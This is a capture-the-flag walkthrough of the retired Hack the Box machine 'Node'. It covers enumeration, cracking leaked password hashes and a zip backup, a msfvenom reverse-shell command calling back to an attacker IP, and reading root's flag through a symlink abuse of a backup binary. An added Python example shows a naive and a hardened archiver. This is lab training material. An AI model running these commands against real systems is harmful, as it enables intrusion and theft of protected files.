Hack the Box Challenge: Node Walkthrough
Hello friends!! Today we are going to solve another CTF challenge, “Node”, which is available online for those who want to improve their skills in penetration testing and black-box testing. Node is a retired vulnerable lab presented by Hack the Box for online penetration-testing practice matched to your experience level; they have a collection of vulnerable labs as challenges from beginner to expert level.
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are available online, they have a static IP; the IP of Node is 10.10.10.58, so let’s begin with nmap port enumeration.
nmap -A 10.10.10.58
From the image below, you can observe that ports 22 and 3000 are open on the victim’s machine.
Knowing that port 3000 is running HTTP on the target machine, we open the IP in our browser.
We open /api/users and find usernames along with their password hashes.
We use https://crackstation.net to crack the hashes we found earlier.
We click on login and use one of the usernames with its corresponding password. Once logged in, we find an option to download a backup. We click on it and it downloads a file called “myplace.backup”.
We take a look at the downloaded file and find that it is base64 encoded.
We decode the backup file and find it to be a zip file.
base64 --decode myplace.backup > data.zip
When we try to unzip the file it asks for a password, so we use fcrackzip to brute-force the zip file with rockyou.txt as the wordlist. Once it finds the password, we use it to unzip the file.
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt data.zip
We use this username and password to log in to the target machine through SSH.
After logging in through SSH, we use wget to download LinEnum.sh onto the target machine and run it to enumerate the machine and look for privilege escalation vectors.
We find 3 directories inside /home, which means there may be 3 users with these names.
When we take a look at the processes running on the system, we find that app.js is running as the tom user.
We open app.js and find the same username and password that we found earlier, which means the backup was created using this script. Going through the file we also find that the script calls a file called backup in the /usr/local/bin directory and passes it a key to create a backup.
Now that we know the target machine is running MongoDB, we use this to exploit the system and get a reverse shell.
We first create a Python one-liner reverse shell using msfvenom.
msfvenom -p cmd/unix/reverse_python lhost=10.10.14.3 lport=8765 R
We then set up our listener using netcat and wait for the reverse shell. After getting the reverse shell we spawn a TTY shell using Python and find that we are logged in as the tom user. We go to the /home/tom directory, find user.txt, and open it to get our first flag.
Now we create a new directory, test, and symlink root.txt from the root directory into /tmp/test. We then use the backup binary to create a zip backup of the /tmp/test/ directory. As /tmp/test contains a link to /root/root.txt, the backup will actually contain the root.txt file from the root directory.
mkdir test
ln -s /root/root.txt /tmp/test
/usr/bin/backup -q "the key in app.js" /tmp/test
We go back to the web page and download the backup file. We decode it the same way we did earlier and use the password “magicword” we found earlier to unzip it. After unzipping the file we find root.txt, and when we open it we find our final flag.
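To show why the symlink step above works and how a backup routine should guard against it, here is an added Python example (not the box’s backup binary and not the author’s code): a naive archiver that follows symlinks, beside a hardened one that refuses links and anything resolving outside the directory it was asked to back up. All paths and the “flag” content are constructed in a temporary directory.

```python
import os
import tempfile
import zipfile

def naive_backup(src_dir, zip_path):
    """Archive every regular file under src_dir. os.path.isfile() and
    ZipFile.write() both follow symlinks, so a link is archived with its target's data."""
    with zipfile.ZipFile(zip_path, "w") as zf:
        for name in sorted(os.listdir(src_dir)):
            path = os.path.join(src_dir, name)
            if os.path.isfile(path):
                zf.write(path, arcname=name)

def safe_backup(src_dir, zip_path, allowed_root):
    """Hardened variant: skip symlinks and any entry whose real path lies
    outside allowed_root. Returns the names that were skipped."""
    root = os.path.realpath(allowed_root)
    skipped = []
    with zipfile.ZipFile(zip_path, "w") as zf:
        for name in sorted(os.listdir(src_dir)):
            path = os.path.join(src_dir, name)
            inside = os.path.realpath(path).startswith(root + os.sep)
            if os.path.islink(path) or not inside:
                skipped.append(name)
                continue
            if os.path.isfile(path):
                zf.write(path, arcname=name)
    return skipped

def demo():
    """Constructed scenario: a fake 'root' dir holding a secret, a staging dir with only a link to it."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_dir = os.path.join(tmp, "root")
        os.mkdir(secret_dir)
        secret = os.path.join(secret_dir, "root.txt")
        with open(secret, "w") as f:
            f.write("constructed-flag-not-real\n")  # placeholder, not a real flag
        stage = os.path.join(tmp, "test")
        os.mkdir(stage)
        os.symlink(secret, os.path.join(stage, "root.txt"))
        naive_backup(stage, os.path.join(tmp, "naive.zip"))
        with zipfile.ZipFile(os.path.join(tmp, "naive.zip")) as zf:
            leaked = zf.read("root.txt").decode()  # target contents, not link info
        skipped = safe_backup(stage, os.path.join(tmp, "safe.zip"), stage)
        with zipfile.ZipFile(os.path.join(tmp, "safe.zip")) as zf:
            safe_names = zf.namelist()  # empty: the link was refused
    return leaked, skipped, safe_names
```

The naive archive answers the question of how a link ends up with real content: the archiver opens the link, and the kernel hands it the target file. A privileged backup tool should also drop privileges or run as the owner of the source directory rather than root.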
Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast.
3 thoughts on “Hack the Box Challenge: Node Walkthrough”
awesome bro!!!! Easy and well explained, nice way to do it!!!
How did you figure out the backup -q parameter part?
I did not get that point: how can a linked file (symlink root.txt) be copied with content, whereas it only contains link info rather than actual data? Is that a feature of the backup binary?